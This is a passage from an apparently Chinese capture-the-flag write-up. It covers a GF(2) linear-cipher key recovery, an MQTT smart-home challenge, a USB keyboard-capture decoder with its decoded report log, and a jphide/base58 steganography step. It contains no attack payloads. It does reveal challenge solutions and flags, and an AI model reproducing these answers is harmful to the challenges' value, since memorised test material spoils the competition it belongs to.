    This isolates the linear part of the cipher so its matrix can be read
    off by feeding in unit vectors.
    """
    state = v
    for _ in range(6):
        parities = [sum(state[k] for k in taps) % 2 for taps in Pbox]
        state = [int(parities[j]) for j in range(32)]
    return state
# res[i] is the image of the i-th unit vector under the linear part of the cipher.
res = []
for i in range(32):
    unit = [0] * 32
    unit[i] = 1
    res.append(simu(unit))
# Transpose: table[i][j] is the coefficient of plaintext bit j in output bit i.
table = [[res[j][i] for j in range(32)] for i in range(32)]

# Key-dependent constant of the affine map: ciphertext XOR (matrix * known plaintext).
key = [(sum([table[i][j]*x[j] for j in range(32)])+cip[i])%2 for i in range(32)]
print("[+] Key:", key)
realflagbin = ""
for i in range(0, len(ciphertext), 32):
    # Strip the constant, leaving matrix * plaintext for this block.
    r = [int(bit) ^ key[j] for j, bit in enumerate(ciphertext[i:i+32])]
    # Augmented matrix [table | r], solved over GF(2) for the plaintext bits.
    bb = [list(table[j]) + [r[j]] for j in range(32)]
    solved = calculate_parameter(bb, 2, 32)
    realflagbin += "".join([str(j) for j in solved])

print(long_to_bytes(int(realflagbin, 2)))

Misc

原来你也玩智能家居

在设置里添加mqtt 127.0.0.1:1833 订阅# topic,然后点下显示器开关可以看到flag

http://222.187.239.143:10013/config/mqtt?config_entry=ca0e8611ab04cb9be7b1cc53afd56f3c

花花画画画花花

打开osu得到flag

签到题

foremost有个zip

套了很多层,直接把最里面的zip dump出来,最后一层有个伪加密解一下得到一个键盘流量,tshark提取一下从网上扒一个读取的代码就拿到flag了

# USB HID keyboard usage ID (two lowercase hex digits, the third byte of a
# report) mapped to the character typed without shift. Non-printing keys are
# written as <NAME> tokens.
normalKeys = {
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
    "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
    "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
    "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
    "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
    "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
    "22":"5", "23":"6","24":"7","25":"8","26":"9",
    "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
    "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
    "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
    "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
    "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
    "44":"<F11>","45":"<F12>"}
# Same usage IDs with a shift key held.
shiftKeys = {
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
    "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
    "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
    "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
    "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
    "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
    "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
    "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
    "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
    "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
    "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
    "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
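# Decode a capture of 8-byte HID keyboard reports, one per line of out.txt in
# the form "mm:00:kk:00:00:00:00:00", into the text that was typed.
#
# Changes from the original listing:
#  - the modifier byte is tested as a bit mask, so right shift (0x20) is
#    honoured as well as left shift (0x02); the original skipped every report
#    whose modifier was not 00 or 02, which is why '_' went missing;
#  - <DEL> at the very start no longer deletes the last token of the list;
#  - <CAP> handling no longer pops from the list while indexing it, which
#    skipped tokens and relied on a bare except to stop;
#  - the file is closed by a with-block and malformed lines are skipped
#    explicitly instead of through `except: pass`.
SHIFT_BITS = 0x02 | 0x20

output = []
with open('out.txt') as keys:
    for line in keys:
        fields = line.strip().lower().split(':')
        if len(fields) != 8:
            continue
        try:
            report = [int(field, 16) for field in fields]
        except ValueError:
            continue
        modifier, usage = report[0], fields[2]
        # Keep single-key reports only: no modifier other than shift, reserved
        # byte zero, first key slot used and the other five empty.
        if modifier & ~SHIFT_BITS or report[1] or report[2] == 0 or any(report[3:]):
            continue
        if usage in normalKeys:
            layout = shiftKeys if modifier & SHIFT_BITS else normalKeys
            output.append(layout[usage])
        else:
            output.append('[unknown]')

print("".join(output))

typed = []
caps_on = False
for token in output:
    if token == '<DEL>':
        # Backspace removes the previously typed token, if there is one.
        if typed:
            typed.pop()
    elif token == '<CAP>':
        caps_on = not caps_on
    else:
        typed.append(token.upper() if caps_on else token)
output = typed

print ('output :' + "".join(output))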

代码有点问题,shift被跳过了找不到下划线,手动加一下

00:00:11:00:00:00:00:00
['n']
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
00:00:13:00:00:00:00:00
['p']
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
['c']
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
['t']
00:00:00:00:00:00:00:00
00:00:09:00:00:00:00:00
['f']
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:2f:00:00:00:00:00
['{']
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00
['w']
00:00:1a:08:00:00:00:00
['w']
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
['l']
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
['c']
00:00:00:00:00:00:00:00
00:00:12:00:00:00:00:00
['o']
00:00:12:10:00:00:00:00
['o']
00:00:10:00:00:00:00:00
['m']
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:2d:00:00:00:00:00
['_']
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
['t']
00:00:12:00:00:00:00:00
['o']
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:2d:00:00:00:00:00
['_']
00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00
['n']
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
['e']
00:00:00:00:00:00:00:00
00:00:13:00:00:00:00:00
['p']
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
['c']
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
['t']
00:00:00:00:00:00:00:00
00:00:09:00:00:00:00:00
['f']
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:2d:00:00:00:00:00
['_']
00:00:00:00:00:00:00:00
00:00:1f:00:00:00:00:00
['2']
00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00
['n']
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
['d']
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:30:00:00:00:00:00
['}']
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:28:00:00:00:00:00
['<RET>']
00:00:00:00:00:00:00:00

少见的bbbbase

stegdetect发现是jphide,没有密码

KkYWdvCQcLYewSUUy5TtQc9AMa

根据题目是一个base,都试一遍发现是base58